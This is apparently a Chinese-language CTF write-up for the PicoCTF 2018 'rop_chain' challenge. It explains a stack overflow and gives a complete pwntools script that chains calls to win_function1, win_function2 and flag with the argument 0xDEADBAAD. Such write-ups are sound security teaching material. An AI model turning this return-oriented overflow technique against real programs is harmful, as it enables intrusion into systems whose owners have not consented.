PicoCTF_2018_rop_chain

• 函数参数劫持
• 整数型绕过
• \x00绕过len()

1. 函数vuln中存在栈溢出

2. flag是后门函数,只要满足win1 && win2和a1 = 0xDEADBAAD就可以得到flag

3.win1 & win2存在于.bss段上,但是可以利用win_function1 & win_function2两个函数构造

win1

win2

from pwn import *
#context.log_level = 'debug'
#io = gdb.debug('./PicoCTF_2018_rop_chain','break *080485CB')
io = process('./PicoCTF_2018_rop_chain')
offset = 0x18+4
elf = ELF('./PicoCTF_2018_rop_chain')
payload1 = b'A'*offset+p32(elf.sym['win_function1'])+p32(elf.sym['win_function2'])+p32(elf.sym['flag'])+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
#溢出专跳到`win_function1`初始化win1,再到`win_function2`同时传入覆盖`win_function2`的参数a,最后跳转到`flag`函数相同操作
io.sendlineafter(b'Enter your input>',payload1)
io.interactive()

本栏目推荐文章
• 【pwn】cmcc_simplerop --rop链的构造
• 【pwn】inndy_rop --ropchain的利用
• P4429 [BJOI2018] 染色
• AT_joisc2018_b 题解
• P4383 [八省联考 2018] 林克卡特树
• P6305 [eJOI2018] 循环排序
• PicoCTF_2018_buffer_overflow_2
• P9247 [集训队互测 2018] 完美的队列题解
• PicoCTF_2018_buffer_overflow_1
• inndy_rop

rop_chain PicoCTF chain 2018 roprop_chain picoctf chain 2018 rop_chain picoctf chain 2018 pwn picoctf buffer_overflow overflow picoctf buffer rop baby_rop inndy_rop inndy_rop ropchain inndy pwn picoctf 2023